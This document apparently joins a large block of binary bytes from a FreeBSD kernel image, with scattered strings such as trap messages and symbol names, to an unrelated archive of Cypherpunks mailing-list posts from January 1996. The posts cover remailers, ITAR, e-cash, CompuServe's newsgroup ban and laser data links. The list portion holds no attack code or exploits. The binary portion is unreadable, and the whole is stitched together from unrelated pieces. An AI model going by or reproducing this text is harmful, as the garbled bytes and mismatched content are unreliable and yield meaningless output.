ðèãøÿR‹‹P‰Q‹H‹‰Z¹DËðÁâÑ;	t
Áê"ˆðÇ@
h8
ðèÂâøÿR‹‹P‰Q‹H‹‰Z¹ŒâðÁâÑ;	t
Áê"ŒðÇ@
h)
ðètâøÿR‹‹P‰Q‹H‹‰Z¹È"ðÁâÑ;	t
Áê""ðÇ@
ƒÁpQè9Ö

¹ðé&



Fatal trap %d: %s while in %s mode










þŽ°
¸
‹I‰MÌë‹Žà
¸
‹› 
i
‹› 
‹€ 
Ç‚
Ç‚
Ç‚
Ç‚
Ç‚
Ç€Œ
Ç€Œ
u&‰Ø9]}‹EPVÿu
ÿuèÿÿÿÿE
Ot-1ÛƒÄëC€<3
)ð(ÿÿÿSèBËøÿj
Sè-ýÿÿƒÄë¡)ð...(ÿÿÿ¡)ð...,ÿÿÿ...(ÿÿÿP...8ÿÿÿP...HÿÿÿP...\ÿÿÿP¸)ðƒ}
èÿÿÿÉÃ!bActive!n-!bDrivers
)ðRÿuàèëÂøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè"Âøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè×Áøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàèÁøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè'Áøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè×Àøÿjÿÿuàÿu
‹Uƒ}
"›
ƒøXtié<þÿÿƒøctgé2þÿÿƒøtK
ƒøxtLéþÿÿ=W

‡h
ÇƒŒ
è
úÿÿ‰ÇƒÄGÿƒø
‡€
ÇƒŒ
...Àt7é5üÿÿƒø...+üÿÿèNëÿÿé!üÿÿjÿ5èðè¯àÿÿj
FreeBSD Kernel Configuration Utility - Version 1.0
 Type "help" for help or "visual" to go to the visual
 configuration interface (requires MGA/VGA display or
 serial terminal capable of displaying ANSI graphics).







1Àéò
CB€;
€; t€;	ußÆD*À
E1/4PSèž






















)ðE¹PèÜ(c)øÿƒÄ$·C
...Àt1/4À@HPh¢1ðEÄPè1/2(c)øÿ¿C
Ph¢1ðEÊPèª(c)øÿÿsh
)ðEÐPè(tm)(c)øÿƒÄ$ÿsh¢1ðEØPè...(c)øÿÿsh¢1ðEáPèt(c)øÿÿs h
)ðEçPèc(c)øÿƒÄ$¸GLðƒ{4
ƒÃ@ƒ;
ƒû
tƒû
uÆ

ÇEø

‹EðƒÀÉëEðÀøw=EðÀ(c)Eð9}ð}/...ö|9Mür
u‹Uô9Uð~3/4ÿÿÿÿë
3/4
h-Sðèðšøÿ‹OD‰Mü‹w@æ
h|TðèÈ(tm)øÿ‹^@ã

¸ÿÿÿÿë‰
PVð‰5TVðÆµð1Àeø[^ÉÃU‰å€=¶ð


è9¨ÿÿƒÄ"À|ò1ÿj	èÝþÿÿ˜l


æpˆÐæq°
æp°æqj
è¤ÿÿ‰ÂƒÄ...Òth´_ðRhþ_ðè9øÿƒÄ
j
Æ´ð)Š´ð°
æpˆÐæqÉÃ





MàÐ1Ò÷ñ...Òt‹M
‹	±
MàÐ1Ò÷ñ...Òt‹M
‹I±






ƒ{




C9û|¿1Àe¸[^_ÉÃSense Drive Status failed














ÇEð
Wjjÿuìèeøÿÿhà"
Wjjÿuìè"øÿÿÄ...Àuhà"
u
ÿ0è





h%{ðë0¿ †










²÷ÿƒÄƒ~
‡



öF(...•üÿÿ‹F$%À
ƒ~Ž÷þÿÿ‹F$%À





Eð‰ÚîY‰ÚìˆÁ€áˆÈîÆ†¯
·-ª
·-ª

ƒùt]ë‰ƒù@t#ù€
ÆƒÎ
1Àé;

Phó£ðë¶(c)

0ÀîQ
îQ
° îQ
°îQŠƒâ

Ç†€
·-ª


"

·-ª
·-ª
SRè(c)(úÿƒÄ‰Eøƒ}ø4u0SVè
ÇEø

ÿÿÇ

ŠEø‰Êîf‹MøfÁé‹}ðƒÇ
ˆÈ‰úî‹MðƒÁ‰ð‰ÊîfÁè‹uðƒÆ	‰òî°
‹Uðî€"°
ŠEðîf‹UðfÁêˆUü‹MøƒÁ
ŠEü‰Êî‹MøƒÁŠE‰Êîf‹MfÁé‹uøƒÆ	ˆÈ‰òî°‹Uøî€¿°

ŠEÜ‰Êîf‹MÜfÁéw
ˆÈ‰òîOˆØ‰ÊîfÁëO	ˆØ‰Êî°‰úî‹M€¹°



/øÿƒÄh#ºðèý.øÿ€MüÿuüSèÔùÿÿƒÄ
...À...
¸
æ °Âæ °æ °(æ¡°æ¡°æ¡°ÿæ¡°
æ ‹]üÉÃisa_dmacascade: impossible request
ÉÃ€âˆÑ€ÉÀˆÈæÖˆÐæÔÉÃisa_dmastart: impossible request
é§
‰ð$
Dë‰ð$
HæÖ0ÀæØµðÿÿÿ‰Uü‰ÑÁÀ
NMI ISA %x, EISA %x



‰Møƒûw
ƒûtƒþ
v
¸
èåŒÿÿ‰òì"Eø¶ÈƒÄ¶Eü9ÁtKuâ¶Eü9Á"À%ÿ
ÇEü

fƒ¹Ôð
€f÷Vèç÷ÿeø[^ÉÃlpclose
QèD
öFt€Neø[^ÉÃinterrupt-driven



"

ì4¸$ø8EètI""
‰
Ø^ðë
¡Ü^ð‰H‰
Ü^ðÿà^ð¡(







EôPèêÿÿ‹U‹R‰UìƒÄú°ÿæ!ƒÂ‰Uè°€î°
‹Uìî‰×G0À‰úî°‹Uèîh,E

1Àé3/4
ŠC
ˆC
ÿC‹Eô€
€}ü

fƒ""
¸
Ç`ýð

$
‹uÐÆÔ
‹}ÐŠO€á¿ˆO‹]ÌƒÃˆÈ‰Úîé(
j‹Uÿ2ÿuÐèÕ

B‰Uø¨-t(¨tÉ
¸
ÇEü
ë*ƒûtë#ŠA$‰òÐë‰ð
Aë‰ðöÐ"AˆA‹Qlîû1Àeø[^ÉÃU‰åƒìVSj



‹ƒàƒøu&÷B
ˆ


è‹Oÿÿä`ƒÄëìèCL
èqOÿÿä`ˆÁƒÄ€ùút€ùît€ùþt	CûŸ†
è5OÿÿƒÄäd¨tðj
è%Oÿÿä`¶ÐˆÁƒÄ€ùútÚ€ùªt
RhÊ	ðè:æ÷ÿ¸

ðèä÷ÿƒÄ€=d3ð
ðë"hË
ðë=`3ð´
ðëhâ
ðèÊã÷ÿƒÄÿ5X3ðjhê
ðèµã÷ÿ1Àeô[^_ÉÃ
...Àt"é
c
À"H
K






f‹Cf‰G‹C@%

›þÿéÒöÿÿŠ"Ét
€ùté-ýÿÿ€KH é¸öÿÿ9,²ðu)ƒ{H u#Æi3ð
¸



Æ\3ð
ƒøMtQé­

...öté.
...ötéF

‰Gé"
ƒ%X3ðýöG(t
€
X3ðë7ƒ%X3ðûé­
‰Y‹ÀYð‰r¡ÀYð£,²ð¹

ƒú8tié¥
QèÞ¹þÿ‹5,²ð‹F
À‰Eô†
‡M

Æi3ð

è#ÿÿƒÄKƒûÿuê‹]üÉÃ
èãÿÿä`¶ÐƒÄúú
ºÅ

‹UôîAƒù~Þ‹`3ðƒÂì1ÉˆÈºÀ
¸

ðë‹EäÈŠ"1
ð‹]ˆA9MøÌGÿÿ
ÆT4ð
¶†î









1Àéé




öG"z
ƒÄ
‹Uø€z	F‹MIÁàÇ€|Zð
...À"Æ
"ž
€Oéù
tO‹UR‚Áà"HZðÿD8ƒ|8
ÇD4
$X<Xth€qðQÿuôèÓ
hÇwðë'ÆC	1Àé(tm)
u
Sè

t	Sèî
MˆÈîSŠMþÁˆÈîSŠEîh'





¸
¸ÿÿÿÿÉÃ‹@Zð...Àth"ðh€vðœ

¸
...³ýÿÿ‹]ôèWþÿ...À...¯ýÿÿƒ}ø


P3/4CPh±...ðè-j÷ÿeø[^ÉÃU‰åVS‹]‹M
3/4SR‚ÁàÇ€|Zð
¸
€z	~ÆB	Aƒù~Ùh ¡

<...¸\ð
"É|öÁt
WìˆF
ŠEü È8Eüu
‰Èƒàë"û'
BAŠˆ"Àuö‰Ø‹]üÉÃ
uB9Âr÷)ÐÉÃ
P¶E	P¶EPh°ðh1/4\ðèÞi÷ÿ¸1/4\ðÉÃ
¿




¶ðø¶ð$·ðP·ð|·ð
	The Regents of the University of California.  All rights reserved.


ð¡zð›zð'zð‹zð†zðzðyzðuzðozðgzð_zðUzðLzðEzð;zð1zð'zð#zðzðzðzðýyðõyðìyðãyðÙyðÔyðÊyðÄyð¿yð·yð"yð¢yð(tm)yðyð"yðyyðmyðayðYyðNyðByð9yð-yð)yðyðyðyð÷xðëxðßxðÔxðÈxð1/2xð






		
 @			

		!






		
		

 !@€

÷ððÜÿðhðôTðÐÿð

ller

Soundblaster, SBPro, SB16, ProAudio Spectrum










jJ



**

3

[k
ð 

	





    cosmos@sponsor.octet.com:/usr/src/sys/compile/SPONSOR


@îð~
	
ðˆ	





















ð

ð€



ðŽ"
*
+
2
3
$Pð";
ðÂ;
?
B
G
ð-H
ðKN
ðOU
ðúV
ðâZ
_
c
d
ðth
ð h
ðÃi
j
¹ð÷p
t
ðÃx
ðy
z
Dðâ
†

ðS
ðW•
ð\•
ðj•
ðq•
ðx•

¤¤
indoverlap
sc
cksum
lose
_vop_pathconf_vp_offsets
nfs_mmap
ad
lpg1

_spec_print
getlock

ab_tty
_kstack
nit
xec_check_permissions
d
p_pager_free_swap
winactive
te_in_progress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Jan 1996 03:55:38 +0800
To: cypherpunks@toad.com
Subject: Microsoft has a way to go on E-Mail
Message-ID: <ad115e4402021004c68c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



It looks to me as if Microsoft has a way to go on e-mail. Every message I
send to the list generates long bounce messages sent back to me. I assume
others are getting the same thing.

For example, just the latest one, sent from Postmaster
<postmaster@microsoft.com>:

The following recipient(s) could not be reached:

      Zeke Lucas on 01/03/96 22:50:19
            The recipient name is not recognized
            [MSEXCH:MSExchangeMTA:northamerica:RED-70-MSG]

      Bruce E. Johnson on 01/03/96 22:50:19
            The recipient name is not recognized
            [MSEXCH:MSExchangeMTA:northamerica:RED-70-MSG]

      Christopher Carper on 01/03/96 22:50:19
            The recipient name is not recognized
            [MSEXCH:MSExchangeMTA:northamerica:RED-70-MSG]

      John Douceur on 01/03/96 22:50:19
            The recipient name is not recognized
            [MSEXCH:MSExchangeMTA:northamerica:RED-70-MSG]

      Mike Montague on 01/03/96 22:50:19
            The recipient name is not recognized
            [MSEXCH:MSExchangeMTA:northamerica:RED-70-MSG]

Etc.


Either Microsoft handles undeliverable mail different from most other
places, or they don't want employees getting the Cypherpunks list (:-}). I
suspect the former.


--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 5 Jan 1996 04:59:58 +0800
To: Tony Iannotti <hal9001@panix.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <199601042002.MAA04835@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 13:55 1/4/96 -0500, Tony Iannotti wrote:
>On Thu, 4 Jan 1996, Robert A. Rosenberg wrote:
>
>> Yes it would require that the Node be checked in the Software. What I was
>> responding to was a claim that there is no way of telling where I am
>> connecting from (which I disproved). As to calling a non-German Node, that
>> is always an option.
>
>Yes, I agree. I think the real difference is that they really cannot tell
>where you are calling from, even though they know where you are
>connecting. 

Caller ID could tell them where you are calling from.  They can also use
their billing information and user profile information to decide where you
live and/or how old you are.  I wonder if any of these filters will keep
the German prosecutors off their necks, given that they can be bypassed.

I feel sorry for them given the situation they are in, and want to kick
their butts for just rolling over dead instead of fighting for free access.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 5 Jan 1996 03:22:32 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Will the real Anonynous please stand up
In-Reply-To: <199601040332.WAA24066@pipe6.nyc.pipeline.com>
Message-ID: <199601041808.NAA06944@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


tallpaul writes:
>Even English monarchs, in centuries past when monarchs like Anonymous only
>had one name, were given some additional signifier to keep them separate
>(e.g. "Donald the Fat" vs. "Donald the Terribly Ugly" vs. "Donald the
>Wonderful With A Really Good Ad Agency"). 

Get a grip.  Those monarchs didn't make those names.  Others did.
You're free to make up your own relative clauses to attach to
"Anonymous" --- if they're good enough maybe others'll start using
them.

Meanwhile, *you* need to consider what reputation statements from
anonymous sources are worth.  One needs some degree of reputation to
make a useful comment on another's.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gordon Campbell <campbelg@limestone.kosone.com>
Date: Fri, 5 Jan 1996 01:39:49 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks List
Message-ID: <2.2.32.19960104170925.00686904@limestone.kosone.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:27 PM 1/2/96 +0100, Anonymous wrote:
>
>Cypherpunks write code. With that phrase and the wave of attempts to 
>censor the 'Net, I've embarked on a quest to make remailers easier to use.
>
>Has anyone written an easy to use Windows or DOS application that will let
>someone chain a message through several remailers, perhaps with support
>for the mailer at alpha.c2.org? 

What about Private Idaho? It's fairly simple to use and even has built-in
routines to setup and use accounts at C2.

http://www.eskimo.com/~joelm

>
>Would the writer of such a program, if in the US fall under the provisions
>in ITAR? Obviously, calls to the PGP program would have to be made. I
>recall reading that such hooks do fall under the ITAR. If this is true, so
>much for a more user friendly version of chain for the masses. 

It boggles the mind the number of goofy rules and regs you yanks have to
deal with. The various branches of your government can't get along enough to
pass a budget, yet they're worried about the rest of the world using strong
encryption. <head shaking>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Help! Help! The paranoids are after me!

iQEVAwUBMOar8HNDC2/K0TjxAQHEGwf/UiZfiB0pWpVmF+jaDWTFjXCMBqTRMToH
kLsSvag40WCrCDgAWxbG92WjArTcyMyexkMnz+VLnZ7rqJC1ZYvgWHVkiGtbDsOi
Unpm7PP/D3M9qUP3QIHGuRM3WmZcXk/sUuyd3le/ggEgpYGqr+/ISA199NbKNb5v
aXb9YiPr3abHiRyFe2IC4a5aYCn4PTbusG5qygu5wY3UCtynkrEwqB5yccmpfQhG
4paCoww5zB0c9LQBEunbDtDKw4KgIck8o6G3AmNANAXYsCOIhUUuzn3dLuAJyCdg
JO3+hO1+b3G4vbemJFrOQ3u+kVNqyGOYBtq6CDVb9OiB3KIu8VnPPQ==
=8gvf
-----END PGP SIGNATURE-----

-----
Gordon R. Campbell, Owner - Mowat Woods Graphics
P.O. Box 1902, Kingston, Ontario, Canada  K7L 5J7
Ph: (613) 542-4087   Fax: (613) 542-1139
2048-bit PGP key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 5 Jan 1996 05:12:17 +0800
To: Rudi Raith <rra@feilmeier.de>
Subject: No Subject
In-Reply-To: <199601041317.OAA04812@aws26.muc.feilmeier.de>
Message-ID: <199601042010.MAA00405@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




>I suppose that there is a predicate indecent_p(n), which is true if n
>represents something indecent, false otherwise. (Some implementation
>of such a predicate could be a police officer arresting you upon
>presentation of the number to him, yielding true. :-) ) Such numbers
>may be called "Indecent Numbers", their "posession", "transfer",
>etc. be banned.

interesting idea. but I suspect you could prove there is no such 
function indecent_p(n) by other ideas you present in your article,
namely diagonalization and the use of encryption schemes.

rough sketch: it would be easy to create an "encryption" or
encoding scheme that maps 'n' for which indecent_p(n) is 
true onto 'm' for which indecent_p(m)
is false, and vice versa, for sufficiently complex indecent_p(n)
("insufficiently complex" versions of the function would be e.g.
versions that are true or false for only a finite number of cases,
or other situations).

hence you get a contradiction.

this all is under the heading of "steganography" of course. it seems
to me some interesting basic theorems in steganography such as the
above are waiting to be explored, in the way that Shannon explored
some of the very basic information theory areas without really giving
a lot of practical results.

in fact what annoys me about people is that they talk about various
functions as if they can even exist, when it is transparently obvious they
cannot; another common example here:

- "detect_encryption(n)" where n is a message. endlessly assumed in
various messages here on the list of people who fear a police state.

- "detect_randomness(n)" where n is a sequence. presumably used
by a police state to outlaw random strings. (similar to above)

this ties in with another point I like to make in this line of thinking:
Shakespeare once said, "there is nothing good or evil, but thinking makes
it so". I would say, "there are no tyrannical laws, but thinking makes
it so". it seems to me a lot of people here do the hard intellectual labor
of trying to figure out/anticipate how a police state could exist in the 
20th century of cyberspace. be careful what you think about, because
thinking can make it so.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Jan 1996 04:18:51 +0800
To: cypherpunks@toad.com
Subject: I don't proofread...sorry.
Message-ID: <ad11623905021004b47a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:30 PM 1/4/96, Jim Ray wrote:

>As to the "English lesson," I feel that proofreading messages to
>1200+ people is more important than proofing private e-mail, but
>some folks evidently disagree with me. For an example of posts
>which I feel are properly proofed, please see Tim's posts. They
>aren't perfect English (mine aren't either) but there's evidence
>that he takes the time to proofread them. This not only makes
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>his posts easier to read, it makes them [IMO] more convincing.
>Of course, I usually agree with Tim anyway. [Hi Tim] I'll shut

Thanks for the positive comments, but I need to clear the air about this
"proofreading" business: I usually don't proofread my posts.

I write 'em as fast as I think 'em, then I send 'em!

A few of my longer essays I've proofed, reworked, etc., but mostly I just
respond by typing directly and then sending. I no longer even use a
spelling checker, in fact.

This can probably be guessed by some of you, as I sometimes leave out
words, which careful proofing would normally catch. I figure that informal
communications are tolerant to such informal usages.

I also tend to write in a conversational style, so the agonized structuring
and restructuring that some writers apparently feel they must go through
does not enter in to my own writing. (I'm a relatively fast typist, and am
comfortable composing at the keyboard, which not everone is, of course.)

One thing I try to scrupulously check are the distribution list and the
other message headers, usually because I edit down the distribution list
and sometimes to change the thread title to something more closely related
to my actual message (as I have done here).

--Tim May


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Fri, 5 Jan 1996 05:16:56 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft has a way to go on E-Mail
Message-ID: <199601042026.MAA29553@alaska.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I've just installed the Microsoft Exchange Server release candidate 
at the office.  I am firmly convinced that the bounce messages Tim 
just mentioned are from an Exchange server that has not been set up 
correctly.

Things I've noticed:

If the client sends a message to an invalid address on the same LAN  the server 
returns an error saying that there is no transport available.

If the mail is from an oustide source, the recipient is not 
recognized.

It's really easy to make mistakes because there is no consistency 
whatsoever between Exchange Server and MS-Mail Server.

Brad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 5 Jan 1996 02:43:31 +0800
To: cypherpunks@toad.com
Subject: [NOISE]Apologies accepted.
Message-ID: <199601041732.MAA07216@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

All apologies accepted.

As to the "English lesson," I feel that proofreading messages to
1200+ people is more important than proofing private e-mail, but
some folks evidently disagree with me. For an example of posts
which I feel are properly proofed, please see Tim's posts. They
aren't perfect English (mine aren't either) but there's evidence
that he takes the time to proofread them. This not only makes
his posts easier to read, it makes them [IMO] more convincing.
Of course, I usually agree with Tim anyway. [Hi Tim] I'll shut
up now and resume lurking mode. Please e-mail me privately if
you feel the urge to comment on this distinctly non-cypherpunk
subject. TIA.
JMR

Regards, Jim Ray
 http://www.shopmiami.com/prs/jimray
             "Hooters GUYS? Washington -- GET A GRIP!"
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  <liberty@gate.net>  IANAL
_______________________________________________________________________
Help Phil! e-mail zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMOwN9m1lp8bpvW01AQEk2QP/YRYyPgPjeq6CTa0vhCcsgujIonn2yJLC
zU2wUjVZiACLMtugCQzG5kzjmR4S176QKsowaNrAx9LhPV2xHym+pyJpsK9zA6gp
iZskqymulqjF43Q/rOTzmFoVZfcHhAQdJSeEcit1kp/wERbCIOX80RuL1ZX2WD8p
89BVlhp0zaY=
=+LFM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 5 Jan 1996 03:52:57 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Starting an e-cash bank
In-Reply-To: <v02120d0fad10a42529be@[192.0.2.1]>
Message-ID: <199601041841.NAA08502@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:
>At 13:25 1/3/96, Alex Strasheim wrote:
>>I've got a storefront in Chicago.
>>What would prevent me from opening up a Mark Twain account and buying and
>>selling ecash on floppies, in person?

>You touched on a very important issue: the party converting currency into
>Ecash does not have to be the Ecash bank. There have been discussions that
>in the future one should be able to buy Ecash on floppy at the local
>supermarket, similar to today's prepaid calling cards. I certainly would
>like to see that happen rather sooner than later.

Wait a minute.  I can see how one needn't be a bank to convert ecash
into pcash, but going the other way requires that the cash be
transferrable in ways that Digicash isn't.

If I withdraw ecash from the bank, it's marked so I'm the one who's
identified if it's double-spent.  If I give the cash to someone else
(different from paying it to them, which requires they have an account)
they're free to double-spend with (relative) impugnity.

What'd I miss?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 5 Jan 1996 05:30:17 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Hammill 1987 speech
In-Reply-To: <m0tXt3j-000952C@pacifier.com>
Message-ID: <199601042043.MAA03161@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



the Hammill 1987 speech is interesting and prescient but also contains
some of the subtle mind-biases and prejudices of rabid libertarians
that are easy for outsiders to spot. some day I might write a more
ambitious essay on this, but for now I'll list a few items and suggest some
counterclaims that will fry any libertarians brain. all these ideas
have analogues to cryptography which I'll elucidate as best I can.

1. weaponry is good in the hands of individuals, tyrannical in the hands
of the state.

the analogy is with the crossbow and other weapons. as a logical
consequence of these ideas, it seems libertarians
think that utopia could be achieved if everyone could build their own
backyard nukes. they are obsessed with the idea of "deterrence" which
is a fancy word for MAD feer, mutual assured destruction fear.

the analogy to cryptography is: cryptography is good in the hands 
of individuals, tyrannical in the hands of the state.

again the idea is that the stronger the cryptography available to the
individual, the better. however I don't want to get into any of the 
guns == crypto arguments..

2. the world is screwed up because governments have made it that way.

this is such a silly premise but vast masses have subscribed to it 
since the beginning of time. it's easy to say that any problem you have
with your finances or your pet poodle is the fault of the Government,
Big Business, or whatever. libertarians are especially clever in 
constantly inventing new terms, synonymous with "enemy" but not quite
so coarse and vulgar ("statist" is the current favorite epithet), 
to name their endless list of bogeymen who prevent them from 
supposedly achieving their full potential in life.

why is it that libertarians have not created their own state long ago,
but continue to stay in countries that they claim oppress them? I have
never heard a satisfactory response to this.  the real answer of course
is that the rabid libertarians will never find a system they like, they
will criticize anything that exists, and never work to find a better
alternative through constructive, positive means, but are happy to try
to sabotage whatever has been built by others in the name of some
noble and holy guerrilla war.

the analogy to crypto: any technology such as crypto that helps people avoid 
governments, and hide their dealings, promotes utopia. governments
are the root of all evil, and anything that destroys them destroys 
evil.

3. the government vs. the people dichotomy

endlessly, even in a system that is expressly designed to present this
polarization, libertarians subscribe to the idea of "us vs. them" in
every avenue of reality. this thinking is entirely the same as that
held by the NSA and cold war defense contractors. what's the difference?
none.  we have a system in which the designers said it was "of, by, and
for the people", but a libertarian cannot handle this unity, nor can
apparently any other citizen in the US that criticizes their government
as if it is something apart from themselves.

cryptography helps people preserve these illusions of separation.
there are people who are "in" and "out" and those "out" cannot read
your messages. what prevents leaks from "in" to "out"? libertarians
would like to have you believe they have solved this problem with 
technology. but it is not a technological problem. it is an issue
of trust, something that cannot be formalized or preserved by any
invention. but don't tell this to a libertarian, who has dedicated
his entire ideology to attempting to prove that one can actually
achieve human integrity & utopia through technology alone and
insisting that anything else is wholly superfluous.

4. egalitarianism: libertarians are always saying that we don't
have it and ranting about this injustice. 
but in their arguments, such as Hammill's, you will always find subtle 
arguments that they don't really want egalitarianism: some individuals should
have an "edge" with their technology over those who seek to oppress them.
they would be all for it if individuals had the capability to create
atom bombs but somehow governments did not. the philosophy is inherently
desiring inequality at its root.  the implication with crypto is that
governments should have to reveal everything but individuals can have 
total secrecy.


--

beware of someone who tells you that utopia cannot currently be realized
because

1. governments ("they") do not allow it for "us".
2. there are a lot of people preventing it from being realized, and we
have to *get*rid* of them first.
3. the correct technology does not yet exist. once it is invented, however,
all problems will be solved.

I'm not actually going to rebut any of these outright other than to
the degree I have, and point out that history is ample evidence they are
all false.  of course I don't expect any of the libertarians to understand
my points, but frankly I think I am going to enjoy watching obtuse and
angry flames for pushing the hot buttons.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 5 Jan 1996 04:26:07 +0800
To: cypherpunks@toad.com
Subject: AP: Compuserve Will Lift Newsgroup Ban
Message-ID: <Ikv17qS00YUrAAghsr@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Compuserve's original statement from last week is at:
    http://www.compuserve.com/at/pressbox/newsgrps.html

Attached are excerpts from today's AP article.

-Declan

---------- Forwarded message begins here ----------

Columbus, Ohio (AP) -- The on-line service CompuServe says it hopes to
reopen access to 200 sexually oriented Internet forums to all but its
German customers by the end of the month...

	 CompuServe spokesman Jeff Shafer said Wednesday the Columbus-based
company is working on a software fix that will prevent Germans from
accessing the newsgroups while allowing access to customers in the rest
of the world...

 	Munich's senior public prosecutor, Manfred Wick, said this week his
office did not order a ban or provide CompuServe with any list as part
of its investigation of child pornography. But he acknowledged that
police asked CompuServe to scrutinize a list last month. `The decision
on whether and to what extent the groups on the list would be blocked
was left to CompuServe,'' Wick's statement said.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Jan 1996 04:33:24 +0800
To: cypherpunks@toad.com
Subject: Using lasers to communicate
Message-ID: <ad1165bc0602100487b8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:43 PM 1/4/96, Jason Rentz wrote:
>Previous exchanges deleted...
>>
>>With a tightly focused beam (light is easy, I don't know about lower
>>frequencies), you can prevent interception except by very obvious physical
>>devices.  (e.g. Someone in a cherry picker truck.)  You may be able to
>>avoid the need to encrypt the link (and all the paranoia about key
>>management, advances in factoring etc. that that implies.)
>>
>>Bill
>
>The problem with this comes when you start creating links between much
>taller buildings like in San Fran.  Any give building over 30 stories might
>sway a foot or so at any given time.  Combine that with the other building
>and you might get a few feet of movement. (movement not including during an
>earthquake)  :)

Just a couple of points on this optical idea.

We were linking buildings a mile apart in the 70s, at Intel. We needed to
ship CAD data back and forth, and PacBell rates for a dedicated line were
outrageous, slow to be installed, etc. So, a commercially available laser
and modulator/demodulator (modem, but it bears sometimes using the longer
version, to remind people of what it is doing in general) were mounted on
the roofs of our buildings. I'm sure various packages are commercially
available to do this.

As to buildings swaying in earthquakes, somehow I don't think transient
loss of channel capacity during a quake is going to be a pressing concern!
:-} Swaying in ordinary wind is an easily-handled problem. (Any good
engineer can think of several fixes: paraboloidal dish receivers are cheap
(not even optical quality, just to get light pulses), compensation for
sway, acceptance of slightly reduced data rates as modem error correction
handles sway-induced dropouts, movement of the transmitters and receivers
to lower levels, etc.)

Also, nearly all high-tech buildings (or at least more than 95% of all
high-tech floorspace in the U.S.) are less than 3-4 stories tall; most are
1-2 stories. Building sway is nonexistent. And building sway only
approaches the multiple meter level in the highest floors of the tallest
buildings. I would guess that fewer than 1% of all offices are affected;
for them, a lower data rate is acceptable.

I'm actually more positive on low-level (below safety regs get interested
in) light than on free space RF, for bypassing of the local cable/phone
monopolies. There's just not enough "bandwidth of free space" available. Do
the math.

(Footnote: Some years back some of us got interested in the idea of using
lasers to communicate between San Diego/Chula Vista and Tijuana. Ordinary
phone lines turned out to be cheaper.)

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
